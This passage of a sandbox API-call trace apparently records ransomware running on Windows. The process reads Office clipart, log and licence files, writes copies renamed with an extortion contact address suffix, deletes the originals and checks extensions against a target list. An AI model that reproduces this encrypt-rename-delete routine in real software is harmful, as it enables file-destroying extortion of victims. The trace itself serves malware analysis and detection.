Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.194] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105246.wmf")) returned 1 [0071.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF") returned 68 [0071.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF") returned 68 [0071.194] lstrlenW (lpString=".doc") returned 4 [0071.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.195] lstrlenW (lpString=".docx") returned 5 [0071.195] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0071.195] lstrlenW (lpString=".pdf") returned 4 [0071.195] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.195] lstrlenW (lpString=".xls") returned 4 [0071.195] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.195] lstrlenW (lpString=".xlsx") returned 5 [0071.195] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0071.195] lstrlenW (lpString=".ppt") returned 4 [0071.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF") returned 68 [0071.195] lstrlenW (lpString=".zip") returned 4 [0071.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.195] lstrlenW (lpString=".rar") returned 4 [0071.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.195] lstrlenW (lpString=".bz2") returned 4 [0071.195] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.195] lstrlenW (lpString=".7z") returned 3 [0071.195] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF") returned 68 [0071.195] lstrlenW (lpString=".dbf") returned 4 [0071.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF") returned 68 [0071.195] lstrlenW (lpString=".1cd") returned 4 [0071.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF") returned 68 [0071.195] lstrlenW (lpString=".jpg") returned 4 [0071.195] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.196] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.196] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105266.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0071.197] GetLastError () returned 0x0 [0071.197] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1714, lpOverlapped=0x0) returned 1 [0071.617] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1720, lpOverlapped=0x0) returned 1 [0071.618] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0071.618] WriteFile (in: hFile=0x38c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0071.618] SetEndOfFile (hFile=0x38c) returned 1 [0071.618] CloseHandle (hObject=0x38c) returned 1 [0071.618] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.618] SetEndOfFile (hFile=0x384) returned 1 [0071.619] CloseHandle (hObject=0x384) returned 1 [0071.619] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.619] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105266.wmf")) returned 1 [0071.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF") returned 68 [0071.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF") returned 68 [0071.666] lstrlenW (lpString=".doc") returned 4 [0071.666] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.666] lstrlenW (lpString=".docx") returned 5 [0071.666] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0071.666] lstrlenW (lpString=".pdf") returned 4 [0071.666] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.666] lstrlenW (lpString=".xls") returned 4 [0071.666] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.666] lstrlenW (lpString=".xlsx") returned 5 [0071.666] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0071.666] lstrlenW (lpString=".ppt") returned 4 [0071.666] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF") returned 68 [0071.666] lstrlenW (lpString=".zip") returned 4 [0071.666] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.666] lstrlenW (lpString=".rar") returned 4 [0071.666] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.666] lstrlenW (lpString=".bz2") returned 4 [0071.666] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.666] lstrlenW (lpString=".7z") returned 3 [0071.666] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF") returned 68 [0071.666] lstrlenW (lpString=".dbf") returned 4 [0071.667] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF") returned 68 [0071.667] lstrlenW (lpString=".1cd") returned 4 [0071.667] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF") returned 68 [0071.667] lstrlenW (lpString=".jpg") returned 4 [0071.667] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.667] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.667] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0071.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105288.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0071.667] GetLastError () returned 0x0 [0071.667] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x3dd8, lpOverlapped=0x0) returned 1 [0072.048] WriteFile (in: hFile=0x388, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x3de0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x3de0, lpOverlapped=0x0) returned 1 [0072.049] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0072.049] WriteFile (in: hFile=0x388, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0072.049] SetEndOfFile (hFile=0x388) returned 1 [0072.050] CloseHandle (hObject=0x388) returned 1 [0072.050] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0072.050] SetEndOfFile (hFile=0x2c8) returned 1 [0072.051] CloseHandle (hObject=0x2c8) returned 1 [0072.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0072.051] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105288.wmf")) returned 1 [0072.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF") returned 68 [0072.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF") returned 68 [0072.051] lstrlenW (lpString=".doc") returned 4 [0072.051] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0072.051] lstrlenW (lpString=".docx") returned 5 [0072.051] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0072.051] lstrlenW (lpString=".pdf") returned 4 [0072.051] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0072.051] lstrlenW (lpString=".xls") returned 4 [0072.052] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0072.052] lstrlenW (lpString=".xlsx") returned 5 [0072.052] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0072.052] lstrlenW (lpString=".ppt") returned 4 [0072.052] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0072.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF") returned 68 [0072.052] lstrlenW (lpString=".zip") returned 4 [0072.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0072.052] lstrlenW (lpString=".rar") returned 4 [0072.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0072.052] lstrlenW (lpString=".bz2") returned 4 [0072.052] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0072.052] lstrlenW (lpString=".7z") returned 3 [0072.052] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0072.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF") returned 68 [0072.052] lstrlenW (lpString=".dbf") returned 4 [0072.052] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0072.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF") returned 68 [0072.052] lstrlenW (lpString=".1cd") returned 4 [0072.052] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0072.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF") returned 68 [0072.052] lstrlenW (lpString=".jpg") returned 4 [0072.052] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0072.052] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0072.052] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0072.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0072.053] GetLastError () returned 0x0 [0072.053] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x3a14, lpOverlapped=0x0) returned 1 [0072.321] WriteFile (hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0) Thread: id = 12 os_tid = 0xcf4 [0045.425] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x69e960 [0045.425] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x6ae968 [0045.425] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cf50 [0045.425] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x65d080 [0045.426] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cdb8 [0045.426] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3adf020 [0045.428] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce48 [0045.428] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62ce48, Size=0x20) returned 0x60e9d0 [0045.428] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cef0 [0045.428] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cef0, Size=0x20) returned 0x60ea20 [0045.428] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.429] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.429] Wow64DisableWow64FsRedirection (in: OldValue=0x2d0ff50 | out: OldValue=0x2d0ff50*=0x0) returned 1 [0045.429] lstrlenW (lpString="kernel32.dll") returned 12 [0045.429] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9d0 | out: hHeap=0x5d0000) returned 1 [0045.429] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0045.429] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ea20 | out: hHeap=0x5d0000) returned 1 [0045.429] Sleep (dwMilliseconds=0x64) [0045.634] lstrcmpiW (lpString1=".log", lpString2=".bat") returned 1 [0045.634] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0045.634] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.664] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=42674) returned 1 [0046.664] CloseHandle (hObject=0x2e0) returned 1 [0046.664] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 0x20 [0046.664] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.664] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.664] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.665] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.665] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0046.665] GetLastError () returned 0x0 [0046.666] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xa6b2, lpOverlapped=0x0) returned 1 [0046.694] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xa6c0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xa6c0, lpOverlapped=0x0) returned 1 [0046.695] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.695] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x11e, lpOverlapped=0x0) returned 1 [0046.695] SetEndOfFile (hFile=0x2c0) returned 1 [0046.695] CloseHandle (hObject=0x2c0) returned 1 [0046.696] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.696] SetEndOfFile (hFile=0x2e0) returned 1 [0046.697] CloseHandle (hObject=0x2e0) returned 1 [0046.698] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0046.698] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 1 [0046.698] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.698] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.698] lstrlenW (lpString=".doc") returned 4 [0046.698] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0046.698] lstrlenW (lpString=".docx") returned 5 [0046.698] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0046.698] lstrlenW (lpString=".pdf") returned 4 [0046.698] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0046.698] lstrlenW (lpString=".xls") returned 4 [0046.698] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0046.698] lstrlenW (lpString=".xlsx") returned 5 [0046.698] lstrcmpiW (lpString1=".xlsx", lpString2="6.log") returned -1 [0046.698] lstrlenW (lpString=".ppt") returned 4 [0046.699] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0046.699] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.699] lstrlenW (lpString=".zip") returned 4 [0046.699] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0046.699] lstrlenW (lpString=".rar") returned 4 [0046.699] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0046.699] lstrlenW (lpString=".bz2") returned 4 [0046.699] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0046.699] lstrlenW (lpString=".7z") returned 3 [0046.699] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0046.699] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.699] lstrlenW (lpString=".dbf") returned 4 [0046.699] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0046.699] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.699] lstrlenW (lpString=".1cd") returned 4 [0046.699] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0046.699] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.699] lstrlenW (lpString=".jpg") returned 4 [0046.699] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0046.699] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.699] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.699] lstrlenW (lpString=".doc") returned 4 [0046.699] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0046.699] lstrlenW (lpString=".docx") returned 5 [0046.699] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0046.699] lstrlenW (lpString=".pdf") returned 4 [0046.699] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0046.699] lstrlenW (lpString=".xls") returned 4 [0046.699] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0046.699] lstrlenW (lpString=".xlsx") returned 5 [0046.699] lstrcmpiW (lpString1=".xlsx", lpString2="6.log") returned -1 [0046.699] lstrlenW (lpString=".ppt") returned 4 [0046.699] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0046.699] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.699] lstrlenW (lpString=".zip") returned 4 [0046.699] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0046.700] lstrlenW (lpString=".rar") returned 4 [0046.700] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0046.700] lstrlenW (lpString=".bz2") returned 4 [0046.700] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0046.700] lstrlenW (lpString=".7z") returned 3 [0046.700] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0046.700] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.700] lstrlenW (lpString=".dbf") returned 4 [0046.700] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0046.700] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.700] lstrlenW (lpString=".1cd") returned 4 [0046.700] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0046.700] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0046.700] lstrlenW (lpString=".jpg") returned 4 [0046.700] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0046.700] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0046.700] lstrlenW (lpString="eula.rtf") returned 8 [0046.700] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.700] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=6309) returned 1 [0046.700] CloseHandle (hObject=0x2e0) returned 1 [0046.700] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 0x80 [0046.700] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.701] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.701] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.701] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.701] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0046.701] GetLastError () returned 0x0 [0046.701] ReadFile (in: hFile=0x2e0, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x18a5, lpOverlapped=0x0) returned 1 [0046.703] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x18b0, 